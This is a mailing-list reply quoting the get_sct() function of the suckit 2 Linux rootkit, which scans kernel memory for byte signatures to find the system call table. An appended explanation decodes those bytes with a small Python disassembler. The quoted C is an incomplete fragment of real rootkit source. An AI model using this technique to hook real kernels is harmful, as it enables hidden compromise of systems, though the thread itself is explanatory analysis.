Re: What does "\xc7\x44\x24\x18\xda\xff\xff\xff\xe8" mean

In what file did you find this? This is how back-doors are written!

On Wed, 5 Apr 2006, openbsd shen wrote:

> This code is from get_sct() of suckit 2. Why does memmem() search for
> "\xc7\x44\x24\x18\xda\xff\xff\xff\xe8"? What does it want to find?
> The get_sct() function:
>
> ulong   get_sct()
> {
>        uchar   code[SCLEN+256];
>        uchar   *p, *pt;
>        ulong   r;
>        uchar   pt_off, pt_bit;
>        int     i;
>
>        kernel_old80 = get_ep();
>
>        if (!kernel_old80)
>                return 0;
>        if (rkm(code, sizeof(code), kernel_old80-4) <= 0)
>                return 0;
>
>        if (!memcmp(code, "PUNK", 4))
>                return 0;
>
>        p = (char *) memmem(code, SCLEN, "\xff\x14\x85", 3);
>        if (!p) return 0;
>
>        pt = (char *) memmem(p+7, SCLEN-(p-code)-7,
>                "\xc7\x44\x24\x18\xda\xff\xff\xff\xe8", 9);
>        /* when execution reaches here, it always returns 0 */
>        if (!pt) {
>                eprintf("pt = %s\n", pt);
>                return 0;
>        }
>
>        sc.trace = *((ulong *) (pt + 9));
>        sc.trace += kernel_old80 + (pt - code) - 4 + 9 + 4;
>
>        pt = (char *) memmem(p+7, SCLEN-(p-code)-7, "\xff\x14\x85", 3);
>        if (!pt) return 0;
>
>        for (i = 0; i < (p-code); i++) {
>                if ((code[i] == 0xf6) && (code[i+1] == 0x43) &&
>                    (code[i+4] == 0x75) && (code[i+2] < 127)) {
>                        pt_off = code[i+2];
>                        pt_bit = code[i+3];
>                        goto cc;
>                }
>        }
>
>        return 0;
> }
> -

Cheers,
Dick Johnson
Penguin : Linux version 2.6.15.4 on an i686 machine (5589.42 BogoMips).
Warning : 98.36% of all statistics are fiction, book release in April.
_
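The bytes the original poster asks about are plain i386 machine code, and the three patterns get_sct() searches for are three instruction encodings. The decoder below is an added example, not code from this thread or from suckit; it handles only those three encodings (`c7 44 24 disp8 imm32`, `e8 rel32`, `ff 14 85 disp32`) and runs over a constructed byte string that copies the quoted signatures with made-up call and table addresses.

```python
import struct

ENOSYS = 38  # Linux errno; 0xffffffda read as a signed 32-bit integer is -38 == -ENOSYS

# Constructed sample (not a real kernel dump): the two signatures quoted in the thread,
# joined with an invented rel32 (0x1000) and an invented table address (0xc02c3180).
SAMPLE = (b"\xc7\x44\x24\x18\xda\xff\xff\xff"   # mov dword [esp+0x18], 0xffffffda
          b"\xe8\x00\x10\x00\x00"               # call rel32
          b"\xff\x14\x85\x80\x31\x2c\xc0")      # call [0xc02c3180 + eax*4]

def decode(code, base=0):
    """Decode the three encodings the thread's signatures refer to.
    Returns a list of (address, mnemonic, operands, note); stops at the first
    byte it does not recognise so it never mis-decodes unrelated data."""
    out = []
    i = 0
    while i < len(code):
        if code[i:i+3] == b"\xc7\x44\x24" and i + 8 <= len(code):
            # c7 /0 with ModRM 44 + SIB 24: mov dword [esp+disp8], imm32
            disp = code[i+3]
            imm = struct.unpack_from("<i", code, i+4)[0]   # little-endian, signed
            note = "-ENOSYS: default syscall return value" if imm == -ENOSYS else ""
            out.append((base + i, "mov", f"dword [esp+0x{disp:x}], {imm}", note))
            i += 8
        elif code[i] == 0xE8 and i + 5 <= len(code):
            # e8 rel32: direct call, displacement relative to the next instruction
            rel = struct.unpack_from("<i", code, i+1)[0]
            out.append((base + i, "call", f"0x{base + i + 5 + rel:08x}", "direct call"))
            i += 5
        elif code[i:i+3] == b"\xff\x14\x85" and i + 7 <= len(code):
            # ff /2 with ModRM 14 + SIB 85: call [disp32 + eax*4], a jump table indexed by eax
            table = struct.unpack_from("<I", code, i+3)[0]
            out.append((base + i, "call", f"[0x{table:08x} + eax*4]",
                        "indirect call through a 4-byte pointer table indexed by eax"))
            i += 7
        else:
            out.append((base + i, "db", f"0x{code[i]:02x}", "not decoded"))
            break
    return out

if __name__ == "__main__":
    for addr, mnem, ops, note in decode(SAMPLE, base=0xC0106000):
        print(f"{addr:08x}  {mnem:<5}{ops:<32}; {note}")
```

So the 9-byte signature is "store -ENOSYS into the saved eax slot at [esp+0x18], then call something", and the 3-byte signature is the indirect call through a table indexed by the syscall number.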

